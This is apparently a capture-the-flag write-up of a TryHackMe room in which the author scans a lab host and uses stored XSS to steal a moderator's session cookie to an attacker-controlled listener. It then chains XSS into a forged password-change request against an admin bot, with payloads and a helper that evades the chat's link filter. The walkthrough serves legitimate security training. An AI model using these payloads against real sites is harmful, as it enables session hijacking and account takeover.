🤨Whats Your Name?
License
The following post by anthonyjsaab is licensed under CC BY 4.0
0 - Introduction
Link to room: https://tryhackme.com/r/room/whatsyourname
Machine version: whatsyournamev1.87
This writeup walks you through a room on TryHackMe created by tryhackme, 1337rce, l000g1c
1 - Port Scan
1a - Discovery
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -T4 -p- 10.10.58.228
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-01 08:42 EEST
Nmap scan report for 10.10.58.228
Host is up (0.11s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8081/tcp open blackice-icecap
Nmap done: 1 IP address (1 host up) scanned in 388.39 seconds
1b - Versioning and OS fingerprinting
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O -p22,80,8081 10.10.58.228
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-01 08:51 EEST
Nmap scan report for 10.10.58.228
Host is up (0.10s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4f:57:0f:de:f3:a7:d2:11:ef:ba:c7:82:0f:f6:4c:58 (RSA)
| 256 f6:d1:12:7c:86:e0:34:6f:35:f8:d6:f8:3e:ce:fc:97 (ECDSA)
|_ 256 f3:62:02:4b:3a:e4:5f:d8:12:fd:22:db:76:45:56:f0 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
8081/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 3.10 (93%), Adtran 424RG FTTH gateway (92%), Linux 5.4 (92%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (91%), Linux 2.6.18 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.26 seconds
2 - Web server probing
The application refers to itself by the hostname worldwap.thm, so we map that name to the target in /etc/hosts. Any subdomain the application uses later (for example login.worldwap.thm, which serves the change password page) needs an entry as well, or the browser will not resolve it:
┌──(kali㉿kali)-[~]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.58.228 worldwap.thm

3 - XSS
3a - Payload injection
The registration form is where we inject the payload: whatever we submit is stored and later opened by a moderator, so a script placed in one of its fields runs in the moderator's browser (a stored XSS). To confirm that it fires, and to capture the moderator's session, the payload reports the page location and the cookies back to a listener we control.

3b - Cookie and location of mod
After a minute or so, the moderator triggers the payload by viewing our registration submission, and their browser sends the following requests to our listener:
┌──(kali㉿kali)-[~]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.58.228 - - [01/May/2024 11:20:04] "GET /?mod_location=http://worldwap.thm/public/html/mod.php HTTP/1.1" 200 -
10.10.58.228 - - [01/May/2024 11:20:05] "GET /?mod_cookie=PHPSESSID=je78rbcm59vddlf9g5b4t3gsa0 HTTP/1.1" 200 -

3c - Mod flag

4 - Probing WORLDWAP
Most features on the website are static and do nothing. The only dynamic ones are the chat and the change password pages.
4a - Change Password form

4b - Chat
This page is interesting. We can only talk with a bot named admin. We can reset the bot and clear the chat.

5 - A closer look at the chat

6 - Finding the correct payload
Through the stored XSS in the chat we can make the bot, which browses the chat as admin, send a forged request to change its own password: a CSRF riding on the admin's session.
First, we capture what a legitimate request looks like by submitting the change password form again and copying the request from the browser's network tab as a fetch call:

await fetch("http://login.worldwap.thm/change_password.php", {
"credentials": "include",
"headers": {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Content-Type": "application/x-www-form-urlencoded",
"Upgrade-Insecure-Requests": "1"
},
"referrer": "http://login.worldwap.thm/change_password.php",
"body": "new_password=hello",
"method": "POST",
"mode": "cors"
});
A simpler payload that sends the same request is:
<script>
// Same POST the browser sent above, without the headers the browser adds by itself
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://login.worldwap.thm/change_password.php");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send('new_password=hello');
</script>
We will clear the chat and try:

It did not work. If the payload does not fire in our own browser, it will not fire in the admin's either. What is the problem? It turns out the chat modifies the payload before storing it, which breaks the script:

The chat turns anything that looks like a URL into a link, which rewrites the http://... string inside our script. Splitting the scheme across a string concatenation keeps a recognisable URL out of the stored text, while the browser still joins the pieces when the script runs:
<script>
var xhr = new XMLHttpRequest();
// "htt" + "p://..." is not a URL at rest, but is the full URL once evaluated
xhr.open("POST", "htt" + "p://login.worldwap.thm/change_password.php");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
// if the chat page is not served from the same origin as login.worldwap.thm,
// also set xhr.withCredentials = true so the admin's session cookie is attached
xhr.send('new_password=hello');
</script>
We clear the chat and try again:

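The writeup only shows the mangled payload as a screenshot, so the exact server-side filter is unknown. The following added example (not the room's code) uses an assumed stand-in for it: a typical auto-link filter that wraps every `http(s)://...` match in an `<a>` tag. Run against both payloads, it shows why the first one is broken and the split-scheme version survives, and it includes a small helper that applies the same split to any `"http://..."` string literal in a script; `linkify` and `evadeLinkFilter` are names introduced here.

```javascript
// Added example, not code from the original writeup.
// ASSUMED stand-in for the chat's link detection: wrap anything that looks
// like an http(s) URL in an anchor tag before storing the message.
const URL_RE = /https?:\/\/[^\s"'<>]+/g;

function linkify(message) {
  return message.replace(URL_RE, (u) => `<a href="${u}">${u}</a>`);
}

// The payload as first attempted: the URL literal is visible to the filter.
const NAIVE_PAYLOAD = `<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://login.worldwap.thm/change_password.php");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send('new_password=hello');
</script>`;

// Rewrite every "http://..." or "https://..." string literal in a script as
// "htt" + "p://..." so that no substring of the stored text matches URL_RE.
function evadeLinkFilter(js) {
  return js.replace(/"http(s?:\/\/[^"]*)"/g, '"htt" + "p$1"');
}

const SPLIT_PAYLOAD = evadeLinkFilter(NAIVE_PAYLOAD);

// True when the stored text comes back from the filter untouched.
function survivesFilter(payload) {
  return linkify(payload) === payload;
}

// What the victim's JavaScript engine actually evaluates at run time:
// the concatenation yields the original URL again.
function urlAtRuntime(expr) {
  return new Function("return (" + expr + ")")();
}

console.log("naive survives:", survivesFilter(NAIVE_PAYLOAD)); // false
console.log("split survives:", survivesFilter(SPLIT_PAYLOAD)); // true
console.log(linkify(NAIVE_PAYLOAD)); // the <a> tag lands inside the JS string
console.log(urlAtRuntime('"htt" + "p://login.worldwap.thm/change_password.php"'));
```

The filter only ever sees the text as stored, so any construction the browser resolves later (string concatenation, `String.fromCharCode`, reading the host from `location`) passes it; the concatenation is simply the shortest. The same check applies to the credentials: the forged POST only changes the password if the admin bot's session cookie travels with it, so if the chat and login pages are on different origins the payload also needs `xhr.withCredentials = true`.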
7 - Getting the flag
We reset the bot, which makes it browse the chat and execute the payload. That should have changed the admin account's password to the one we sent. We try to log in:
